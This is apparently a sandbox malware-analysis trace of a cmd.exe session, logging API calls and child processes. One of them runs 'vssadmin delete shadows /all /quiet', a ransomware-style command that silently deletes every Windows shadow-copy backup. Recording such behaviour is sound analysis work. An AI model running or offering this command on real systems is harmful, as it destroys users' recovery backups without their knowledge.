[0267.690] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0267.690] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x26f788, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26f788*=0x14, lpOverlapped=0x0) returned 1 [0267.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.690] GetFileType (hFile=0xe8) returned 0x3 [0267.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.690] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.690] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0267.690] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e320, cchWideChar=1 | out: lpWideCharStr="Essadmin delete shadows /all /quiet\n") returned 1 [0267.690] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.690] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.690] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0267.690] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e322, cchWideChar=1 | out: lpWideCharStr="xsadmin delete shadows /all /quiet\n") returned 1 [0267.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0267.691] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e324, cchWideChar=1 | out: lpWideCharStr="iadmin delete shadows /all /quiet\n") returned 1 [0267.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0267.691] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e326, cchWideChar=1 | out: lpWideCharStr="tdmin delete shadows /all /quiet\n") returned 1 [0267.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0267.691] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e328, cchWideChar=1 | out: lpWideCharStr="\nmin delete shadows /all /quiet\n") returned 1 [0267.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.691] GetFileType (hFile=0xe8) returned 0x3 [0267.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.691] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.691] GetFileType (hFile=0xf4) returned 0x3 [0267.691] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.691] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="Exit\n", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Exit\n", lpUsedDefaultChar=0x0) returned 6 [0267.691] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x26fa68, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26fa68*=0x5, lpOverlapped=0x0) returned 1 [0267.691] GetProcessHeap () returned 0x2d0000 [0267.691] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4012) returned 0x2f2010 [0267.691] GetProcessHeap () returned 0x2d0000 [0267.691] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2010 | out: hHeap=0x2d0000) returned 1 [0267.691] GetProcessHeap () returned 0x2d0000 [0267.691] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0) returned 0x2e9840 [0267.691] GetProcessHeap () returned 0x2d0000 [0267.691] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1a) returned 0x2e4630 [0267.691] GetConsoleOutputCP () returned 0x4e3 [0267.692] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a19bfe0 | out: lpCPInfo=0x4a19bfe0) returned 1 [0267.692] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0267.692] GetConsoleTitleW (in: lpConsoleTitle=0x26fa20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0267.692] GetProcessHeap () returned 0x2d0000 [0267.692] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x14) returned 0x2e8940 [0267.692] GetProcessHeap () returned 0x2d0000 [0267.692] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1a) returned 0x2e4660 [0267.692] GetProcessHeap () returned 0x2d0000 [0267.692] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x21c) returned 0x2eb9a0 [0267.692] GetConsoleTitleW (in: lpConsoleTitle=0x2eb9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0267.692] GetProcessHeap () returned 0x2d0000 [0267.692] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2eb9a0, Size=0x62) returned 0x2eb9a0 [0267.692] GetProcessHeap () returned 0x2d0000 [0267.692] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb9a0) returned 0x62 [0267.692] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - Exit") returned 1 [0267.693] GetProcessHeap () returned 0x2d0000 [0267.693] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb9a0 | out: hHeap=0x2d0000) returned 1 [0267.693] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0267.694] exit (_Code=2) Process: id = "10" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x6fa69000" os_pid = "0x660" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x610" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 54 os_tid = 0x664 Process: id = "11" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x7008d000" os_pid = "0x670" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x610" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 55 os_tid = 0x674 Thread: id = 61 os_tid = 0x694 Thread: id = 69 os_tid = 0x6b4 Thread: id = 71 os_tid = 0x6c0 Thread: id = 72 os_tid = 0x6c4